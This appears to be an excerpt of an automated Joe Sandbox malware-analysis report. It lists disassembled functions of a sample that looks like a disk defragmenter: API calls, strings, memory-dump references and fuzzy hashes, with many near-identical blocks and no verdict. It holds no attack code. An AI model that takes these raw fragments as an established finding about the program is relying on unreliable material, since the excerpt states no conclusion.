                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                                • Opcode ID: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                                • Instruction ID: faa287cb98b21d4df2f3e2fa49730f9b90f221f68114e230af78a147129465c0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82516271204341AFE324DB21CD45FAF77E8AB88B04F10891EF64D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                                Function 004112B9 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                                • Opcode ID: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                                • Instruction ID: 01dd7cb33c618876df907d584398aa6540e784f12a7d1eb18dd06df18f62a64b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB516171204341AFE324DB21CD45FAF77E8AB88B04F10891EF54D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                                Function 0041E0F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49shutdownCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,00421972), ref: 0041E100
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00421972), ref: 0041E107
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041E124
                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0041E148
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041E14E
                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000001,80020003), ref: 0041E16E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                                • Opcode ID: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                                • Instruction ID: ff8bdaaac48f1339d689247c0ac3bb4d0c15d19762690cb1fcb66aa4c131ddab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7301FC35644310BFE3109BA8DC49B9B7698BB44B04F40482DFD4DE6191D77499408BDA
                                                                                                                                                                                                                                                                                                Function 0045A7D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?), ref: 0045A8C2
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A915
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0045A955
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?), ref: 0045A9AA
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A9CE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DiskFreeSpace$Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                • String ID: %c:\
                                                                                                                                                                                                                                                                                                • API String ID: 281833627-3142399695
                                                                                                                                                                                                                                                                                                • Opcode ID: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                                • Instruction ID: 5c1349d2b4a299dbbed6192556f5b370b8187b703f81d55d5c722b9a40b8fb44
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A071FBB55057019FD314DF64D988BABB7E4FF98711F008A2EE89A87390E734A848CF56
                                                                                                                                                                                                                                                                                                Function 004631F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000003,?), ref: 00463410
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 0046342D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                • String ID: %s%s\$%s*
                                                                                                                                                                                                                                                                                                • API String ID: 3541575487-790581550
                                                                                                                                                                                                                                                                                                • Opcode ID: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                                • Instruction ID: c3493345b0c0ceefe68b50463acd725d1f8c1e028979316797af0ed8e7acec35
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC71B5711083809FC720EF64C884A6BB7E5FB89314F444A6EF85997391E734EA45CB57
                                                                                                                                                                                                                                                                                                Function 004734E6 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00473B49
                                                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00473B5E
                                                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(0047CF54), ref: 00473B69
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00473B85
                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00473B8C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                                • Instruction ID: 5fbb9a2fc2dc4524adccc28e56c0de5744acadb4307870d4d3e04b8eaaabc2f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421E3B8828204DFC700DFA5FC856853BA4FB28329F5040BBE80D87762E77466848F5D
                                                                                                                                                                                                                                                                                                Function 00609277 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2631854093.0000000000609000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                • Instruction ID: 7f45a62b763b18ee1db0e3ef6cde993bceb0ffd0ff8c50725b501db6588a7515
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF06275A50200EFC718DF0AC544CD677F7EB857107654595D4049B3A2D3B0DE45CB70
                                                                                                                                                                                                                                                                                                Function 00428720 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 0042872A
                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00428751
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401099,0047D9D0,0047D9D0,0047D9D0,0047D9D0,00000000), ref: 00428778
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008022,00000000), ref: 0042878F
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401128,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004287AA
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008027,00000000), ref: 004287BB
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401127,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004287D6
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008028,00000000), ref: 004287E7
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004287F6
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401032,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 00428811
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008023,00000000), ref: 00428822
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401033,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 0042883D
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008024,00000000), ref: 0042884E
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401086,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 00428869
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008025,00000000), ref: 0042887A
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00428889
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(10021,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004288A4
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008026,00000000), ref: 004288B5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$Append$CreateCursorPopup
                                                                                                                                                                                                                                                                                                • String ID: 10021$3401032$3401033$3401086$3401099$3401127$3401128
                                                                                                                                                                                                                                                                                                • API String ID: 2468982102-1766060818
                                                                                                                                                                                                                                                                                                • Opcode ID: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                                • Instruction ID: 3f46f92896953761dbd981ebaed820fc3143a3776dcc1953a56c74fff761f47c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9319DF5BD030076D2A066A58D57F9A76A99F84F00F31C80BB74E769C1CAECB4045BAD
                                                                                                                                                                                                                                                                                                Function 00402140 Relevance: 35.3, APIs: 7, Strings: 13, Instructions: 304windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,00094658), ref: 0041DB8A
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A9B0: SHGetFileInfoW.SHELL32(%SystemRoot%,00000040,000002B4,000002B4,00004011), ref: 0041A9DA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000001,00000000), ref: 00402370
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402590: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004023B9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402660: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BitmapDriveDrivesFileInfoLoadLogicalType
                                                                                                                                                                                                                                                                                                • String ID: 3402003$3402041$3402043$3402046$3402047$3402048$8F$CPUIdleTime$CPUUsageExceed$DefragmentedFiles$DiskDefrag\AutoDefragmention$LastDefragmention$tG
                                                                                                                                                                                                                                                                                                • API String ID: 3599163918-1643340582
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                                • Instruction ID: bcfd938aa366970316b1685172ea95c37501a647d75b412e58de97171c7dff61
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4A1D9B17503006BD710FF618D86FAE36A89F44714F10892EF60E7B2D2DABCA844875E
                                                                                                                                                                                                                                                                                                Function 0041B4B0 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 135serviceCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,20000000,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4C2
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,VSS,00000034,?,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4DD
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4EA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
